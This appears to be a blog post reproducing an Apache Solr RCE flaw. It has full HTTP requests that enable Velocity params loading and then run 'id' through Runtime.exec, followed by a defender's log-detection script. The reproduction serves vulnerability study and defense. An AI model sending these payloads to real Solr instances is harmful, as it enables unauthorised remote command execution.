[Vulnerability reproduction] Apache Solr RCE

Vulnerability Details

Author: S00pY. If the core name (its path) is known, the core's configuration can be modified with a single POST request, after which commands can be executed remotely. Tested on Solr 8.2.0, the latest release at the time; it appears that all versions are affected.

Prerequisite
The Solr instance is reachable without authentication.

Vulnerability reproduction

Get the name of an accessible core from the Core Admin page. A pitfall hit while reproducing: if Add Core fails, copy the files from /solr-8.2.0/server/solr/configsets/_default/conf into the new_core folder and retry.

Enable params.resource.loader.enabled

POST /solr/new_core/config HTTP/1.1
Host: 10.211.55.13:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

Command execution

GET /solr/new_core/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: 10.211.55.13:8983

Python EXP

Defense

Do not allow unauthenticated access to Solr.
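As an added defender's example, not part of the original writeup: a Python script that scans request-log lines for the two request patterns described above, a POST to the per-core Config API and a select request with wt=velocity plus a caller-supplied v.template parameter. The log lines, client addresses and the common-log-format regex are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request-log lines in common log format (not captured traffic).
SAMPLE_LOG = """\
10.211.55.2 - - [01/Nov/2019:10:00:00 +0000] "POST /solr/new_core/config HTTP/1.1" 200 120
10.211.55.2 - - [01/Nov/2019:10:00:05 +0000] "GET /solr/new_core/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27) HTTP/1.1" 200 410
10.211.55.9 - - [01/Nov/2019:10:01:00 +0000] "GET /solr/new_core/select?q=title:foo&wt=json HTTP/1.1" 200 980
10.211.55.9 - - [01/Nov/2019:10:02:00 +0000] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 300
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
CONFIG_RE = re.compile(r'^/solr/[^/]+/config/?$')   # per-core Config API endpoint
SELECT_RE = re.compile(r'^/solr/[^/]+/select/?$')   # per-core search handler

def classify(method, target):
    """Return a finding label for one request, or None if it looks benign."""
    url = urlsplit(target)
    if method == "POST" and CONFIG_RE.match(url.path):
        # Step one of the writeup: a POST to /solr/<core>/config that turns on
        # params.resource.loader.enabled. The body is not in the access log, so
        # every config write on an unauthenticated instance deserves review.
        return "config-api-write"
    if SELECT_RE.match(url.path):
        q = parse_qs(url.query, keep_blank_values=True)
        wt = [v.lower() for v in q.get("wt", [])]
        templated = any(k.startswith("v.template") for k in q)
        if "velocity" in wt and templated:
            # Step two of the writeup: wt=velocity with a caller-supplied template.
            return "velocity-template-injection"
    return None

def detect(log_text):
    """Return (ip, method, path, label) for every flagged line in log_text."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        label = classify(m["method"], m["target"])
        if label:
            findings.append((m["ip"], m["method"], urlsplit(m["target"]).path, label))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(*finding)
```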

Reference
https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt


Origin www.cnblogs.com/mark-zh/p/11775851.html